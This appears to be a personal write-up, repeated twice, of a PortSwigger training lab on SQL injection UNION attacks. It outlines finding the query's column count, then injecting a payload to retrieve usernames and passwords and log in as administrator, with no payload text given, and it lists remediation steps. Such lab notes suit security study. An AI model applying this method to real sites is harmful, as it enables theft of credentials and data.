target:
https://portswigger.net/web-security...m-other-tables
Vulnerability Summary:
To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.
Steps to Exploit:
1.Using the technique mentioned in the last note, we can determine the number of columns returned by the query and which columns contain text data. Verify that the query returns two columns, both of which contain text.
2.Inject the payload, then obtain the password belonging to the administrator.
Remediation:
Lessons Learned:
When you have determined the number of columns returned by the original query and found which columns can hold string data, you are in a position to retrieve interesting data
More...
- Lab URL:
https://portswigger.net/web-security...m-other-tables
- Tools Used:
- browser
- Burp suite
Vulnerability Summary:
- Type: SQL Injection
- Description:
To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.
Steps to Exploit:
1.Using the technique mentioned in the last note, we can determine the number of columns returned by the query and which columns contain text data. Verify that the query returns two columns, both of which contain text.
2.Inject the payload, then obtain the password belonging to the administrator.
Remediation:
- Use parameterized queries / prepared statements
- Use server‑side input validation
- Escape and sanitize user input
Lessons Learned:
When you have determined the number of columns returned by the original query and found which columns can hold string data, you are in a position to retrieve interesting data
More...